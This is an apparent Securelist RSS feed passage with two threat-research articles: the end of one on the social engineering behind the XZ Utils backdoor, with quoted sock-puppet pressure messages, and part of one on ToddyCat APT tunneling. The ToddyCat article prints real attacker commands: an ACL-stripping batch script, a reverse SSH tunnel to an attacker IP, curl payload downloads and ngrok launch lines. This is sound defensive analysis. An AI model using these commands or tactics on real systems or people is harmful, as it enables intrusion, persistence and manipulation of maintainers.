1050. patches bit rotting away on this mailing list. Right now you choke your repo.<br />
1051. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?</td>
1052. </tr>
1053. <tr>
1054. <td>Wed, 22 Jun 2022 10:05:06 -0700</td>
1055. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html" target="_blank" rel="noopener">Re: [xz-devel] [PATCH] String to filter and filter to string</a></td>
1056. </tr>
1057. <tr>
1058. <td colspan="2">&#8220;Is there any progress on this? Jia I see you have recent commits. Why can&#8217;t you<br />
1059. commit this yourself?&#8221;</td>
1060. </tr>
1061. </tbody>
1062. </table>
1063. <p>The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: &#8220;Dennis you are better off waiting until new maintainer happens or fork yourself.&#8221;</p>
1064. <table width="100%">
1065. <tbody>
1066. <tr>
1067. <td width="40%">Thu, 19 May 2022 12:26:03 -0700</td>
1068. <td width="60%"><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html" target="_blank" rel="noopener">XZ for Java</a></td>
1069. </tr>
1070. <tr>
1071. <td colspan="2">Is XZ for Java still maintained? I asked a question here a week ago<br />
1072. and have not heard back. When I view the git log I can see it has not<br />
1073. updated in over a year. I am looking for things like multithreaded<br />
1074. encoding / decoding and a few updates that Brett Okken had submitted<br />
1075. (but are still waiting for merge). Should I add these things to only<br />
1076. my local version, or is there a plan for these things in the future?</td>
1077. </tr>
1078. <tr>
1079. <td>Tue, 21 Jun 2022 13:24:47 -0700</td>
1080. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
1081. </tr>
1082. <tr>
1083. <td colspan="2">I am sorry about your mental health issues, but its important to be<br />
1084. aware of your own limits. I get that this is a hobby project for all<br />
1085. contributors, but the community desires more. Why not pass on<br />
1086. maintainership for XZ for C so you can give XZ for Java more<br />
1087. attention? Or pass on XZ for Java to someone else to focus on XZ for<br />
1088. C? Trying to maintain both means that neither are maintained well.</td>
1089. </tr>
1090. </tbody>
1091. </table>
1092. <p>Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:</p>
1093. <ul>
1094. <li>In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions</li>
1095. <li>In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions</li>
1096. <li>In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.</li>
1097. </ul>
1098. <h2 id="spring-2024-pressure-to-import-backdoored-code-to-debian">Spring 2024 Pressure to Import Backdoored Code to Debian</h2>
1099. <p>Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian report log</a> on March 25, 2024 to raise urgency to include the backdoored code: &#8220;Dear mentors, I am looking for a sponsor for my package &#8220;xz-utils&#8221;.&#8221;</p>
1100. <table width="100%">
1101. <tbody>
1102. <tr>
1103. <td width="50%"><strong>Name</strong></td>
1104. <td width="50%"><strong>Email address</strong></td>
1105. </tr>
1106. <tr>
1107. <td>Hans Jansen</td>
1108. <td>hansjansen162@outlook.com</td>
1109. </tr>
1110. <tr>
1111. <td>krygorin4545</td>
1112. <td>krygorin4545@proton.me</td>
1113. </tr>
1114. <tr>
1115. <td>misoeater91@tutamail.com</td>
1116. <td>misoeater91@tutamail.com</td>
1117. </tr>
1118. </tbody>
1119. </table>
1120. <p>The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:</p>
1121. <table>
1122. <tbody>
1123. <tr>
1124. <td>Date: Tue, 26 Mar 2024 19:27:47 +0000</td>
1125. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
1126. </tr>
1127. <tr>
1128. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=17">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression utilities</a></td>
1129. </tr>
1130. <tr>
1131. <td colspan="2">Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work</td>
1132. </tr>
1133. <tr>
1134. <td>Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)</td>
1135. <td>From: misoeater91@tutamail.com</td>
1136. </tr>
1137. <tr>
1138. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=22">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression</a></td>
1139. </tr>
1140. <tr>
1141. <td colspan="2">I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!</td>
1142. </tr>
1143. </tbody>
1144. </table>
1145. <p>The code changes received pushback from Debian contributors:</p>
1146. <table>
1147. <tbody>
1148. <tr>
1149. <td>Date: Tue, 26 Mar 2024 22:11:19 +0000 (UTC)</td>
1150. <td>From: Thorsten Glaser &lt;tg@debian.org&gt;</td>
1151. </tr>
1152. <tr>
1153. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=27">Subject: new upstream versions as NMU vs. xz maintenance</a></td>
1154. </tr>
1155. <tr>
1156. <td colspan="2">Very much *not* a fan of NMUs doing large changes such as<br />
1157. new upstream versions.But this does give us the question, what&#8217;s up with the<br />
1158. maintenance of xz-utils? Same as with the lack of security<br />
1159. uploads of git, which you also maintain, are you active?</td>
1160. </tr>
1161. <tr>
1162. <td colspan="2">Are you well?</td>
1163. </tr>
1164. </tbody>
1165. </table>
1166. <p>To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:</p>
1167. <table>
1168. <tbody>
1169. <tr>
1170. <td>Date: Wed, 27 Mar 2024 12:46:32 +0000</td>
1171. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
1172. </tr>
1173. <tr>
1174. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708#37">Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance</a></td>
1175. </tr>
1176. <tr>
1177. <td colspan="2">Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn&#8217;t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (&lt;https://bugzilla.redhat.com/show_bug.cgi?id=2267598&gt;). Fixing a valgrind break across many apps throughout Debian is the priority here.</td>
1178. </tr>
1179. </tbody>
1180. </table>
1181. <h2 id="what-nexzt">What NeXZt?</h2>
1182. <p>Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at <a href="https://securelist.com/webinars/sas-2021-time-to-make-the-donuts/" target="_blank" rel="noopener"> prior SAS events [registration required]</a>, distilling an assessment into a manageable table.</p>
1183. <p>Unfortunately, we expect more open-source project incidents like XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified <a href="https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/" target="_blank" rel="noopener">similar social engineering-driven incidents</a> in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.</p>
1184. ]]></content:encoded>
1186. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/feed/</wfw:commentRss>
1187. <slash:comments>2</slash:comments>
1190. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-scaled.jpg" width="2668" height="1499"><media:keywords>full</media:keywords></media:content>
1191. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-1024x575.jpg" width="1024" height="575"><media:keywords>large</media:keywords></media:content>
1192. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
1193. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
1194. </item>
1195. <item>
1196. <title>ToddyCat is making holes in your infrastructure</title>
1197. <link>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/</link>
1198. <comments>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/#comments</comments>
1200. <dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
1201. <pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
1202. <category><![CDATA[APT reports]]></category>
1203. <category><![CDATA[APT]]></category>
1204. <category><![CDATA[Cyber espionage]]></category>
1205. <category><![CDATA[Data theft]]></category>
1206. <category><![CDATA[SSH]]></category>
1207. <category><![CDATA[Targeted attacks]]></category>
1208. <category><![CDATA[ToddyCat]]></category>
1209. <category><![CDATA[VPN]]></category>
1210. <category><![CDATA[WhatsApp]]></category>
1211. <category><![CDATA[APT (Targeted attacks)]]></category>
1212. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112443</guid>
1213.  
1214. <description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
1215. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
1216. <p><strong>ToddyCat </strong>is an <a href="https://encyclopedia.kaspersky.ru/glossary/apt-advanced-persistent-threats/" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
1217. <p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" target="_blank" rel="noopener">PsExec</a> or <a href="https://github.com/fortra/impacket" target="_blank" rel="noopener">Impacket</a>.</p>
1218. <h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
1219. <p>Having several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
1220. <h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
1221. <p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
1222. <p>Attackers use several files to launch a reverse SSH tunnel:</p>
1223. <ol>
1224. <li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
1225. <li>An OPENSSH private key file</li>
1226. <li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
1227. </ol>
1228. <p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002: </a><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
1229. <p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
1230. C:\programdata\sshd\ssh.exe
1231. C:\programdata\ssh\ssh.exe</pre><p>
1232. The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
1233. C:\Windows\AppReadiness\data.dat
1234. C:\Windows\AppReadiness\log.dat
1235. C:\Windows\AppReadiness\value.dat</pre><p>
1236. <strong>OpenSSH </strong>private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.</p>
1237. <p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
1238. This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
1239. ::# Set Key File Variable:
1240.  
1241. Set Key="C:\Windows\AppReadiness"
1242.  
1243. takeown /f "%Key%"
1244. icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
1245. icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
1246. icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
1247. icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
1248. icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
1249. icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
1250. icacls "%Key%" >> "%temp%\a.txt"
1251.  
1252. ::# Remove Variable:
1253. set "Key="</pre><p>
1254. In Windows,<strong> C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
1255. <div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png 803w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-300x62.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-768x160.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-800x166.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-740x154.png 740w" sizes="(max-width: 803px) 100vw, 803px" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
1256. <p>The image above shows the default permissions for this folder:</p>
1257. <ul>
1258. <li>Administrators and system: full permissions</li>
1259. <li>Authorized users: read-only permissions</li>
1260. </ul>
1261. <p>This means that regular users can view the contents of the folder.</p>
1262. <p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
1263. <div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png 793w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-768x98.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-740x94.png 740w" sizes="(max-width: 793px) 100vw, 793px" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
1264. <p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
1265. <div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-415x280.png 415w" sizes="(max-width: 736px) 100vw, 736px" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
1266. <p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
1267. StrictHostKeyChecking=accept-new -R 31481:localhost:53
1268. systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
1269. This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222 </strong>as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.</p>
1270. <p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481 </strong>on the server to port <strong>53</strong> on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
1271. <p>Each user is assigned to a different port on the infected host. For example, the user <strong>systemtest05 </strong>redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
1272. <p>The remote server IP information is shown in the table below.</p>
1273. <table width="100%">
1274. <tbody>
1275. <tr>
1276. <td width="17%"><strong>IP</strong></td>
1277. <td width="16%"><strong>Country + ASN</strong></td>
1278. <td width="16%"><strong>Net name</strong></td>
1279. <td width="17%"><strong>Net Description</strong></td>
1280. <td width="17%"><strong>Address </strong></td>
1281. <td width="17%"><strong>Email </strong></td>
1282. </tr>
1283. <tr>
1284. <td>103.27.202[.]85</td>
1285. <td>Thailand, AS58955</td>
1286. <td>BANGMOD-VPS-NETWORK</td>
1287. <td>Bangmod VPS Network</td>
1288. <td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
1289. <td>support@bangmod.co.th</td>
1290. </tr>
1291. </tbody>
1292. </table>
1293. <p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
1294. <div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
1295. <h3 id="softether-vpn">SoftEther VPN</h3>
1296. <p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
1297. <p><a href="https://www.softether.org" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
1298. <p>To launch the VPN server, the attackers used the following files:</p>
1299. <ul>
1300. <li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
1301. <li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
1302. <li><strong>vpn_server.config</strong>: server configuration</li>
1303. </ul>
1304. <p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
1305. <p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
1306. c:\programdata\lenovo\lenovo\kln.exe
1307. c:\programdata\iobit\iobitrtt\tmp\mstime.exe
1308. c:\perflogs\ecache\boot.exe
1309. C:\users\public\music\wia.exe
1310. c:\windows\debug\wia\wia.exe
1311. c:\users\public\music\taskllst.exe
1312. c:\programdata\lenovo\lenovo\main.exe
1313. c:\programdata\intel\gcc\gcc\boot.exe
1314. c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
1315. c:\programdata\kasperskylab\kaspersky.exe</pre><p>
1316. You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
1317. <p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
1318. <p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and downloaded files from remote resources using the <strong>curl </strong>utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
1319. c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1
1320. "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
1321. c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
1322. We observed the following remote resources being used as download sources.</p>
1323. <table width="100%">
1324. <tbody>
1325. <tr>
1326. <td width="65%"><strong>URL</strong></td>
1327. <td width="35%"><strong>Original file name</strong></td>
1328. </tr>
1329. <tr>
1330. <td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
1331. <td>vpnserver_x64.exe</td>
1332. </tr>
1333. <tr>
1334. <td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
1335. <td>Hamcore.se2</td>
1336. </tr>
1337. <tr>
1338. <td>hxxp://23.106.122[.]5/hamcore.se2</td>
1339. <td>Hamcore.se2</td>
1340. </tr>
1341. <tr>
1342. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
1343. <td>vpnserver_x64.exe</td>
1344. </tr>
1345. <tr>
1346. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
1347. <td>Hamcore.se2</td>
1348. </tr>
1349. </tbody>
1350. </table>
1351. <p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
1352. "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
1353. In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
1354. <p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
1355. <table width="100%">
1356. <tbody>
1357. <tr>
1358. <td width="60%"><strong>AccountName</strong></td>
1359. <td width="40%"><strong>Hostname</strong></td>
1360. </tr>
1361. <tr>
1362. <td>ha.bbmouseme[.]com</td>
1363. <td>118[.]193.40.42</td>
1364. </tr>
1365. </tbody>
1366. </table>
1367. <h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
1368. <p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
1369. <p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
1370. <p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
1371. authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
1372. The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="https://encyclopedia.kaspersky.com/glossary/dll-sideloading/" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="https://attack.mitre.org/techniques/T1574/002/" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 0.0.0.0 54112"</pre><p>
1373. Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
1374. <div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" alt="Code snippet for deciphering received data" width="333" height="457" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png 333w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-219x300.png 219w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-255x350.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-204x280.png 204w" sizes="(max-width: 333px) 100vw, 333px" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
1375. <p>This allows Krong to hide the contents of the traffic to evade detection.</p>
1376. <h3 id="frp-client">FRP client</h3>
1377. <p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
1378. <p>The attackers used two files to run the client:</p>
1379. <ul>
1380. <li><strong>Frpc.exe</strong>: a FRP client executable file</li>
1381. <li><strong>Frpc.toml</strong>: a client configuration file</li>
1382. </ul>
1383. <p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
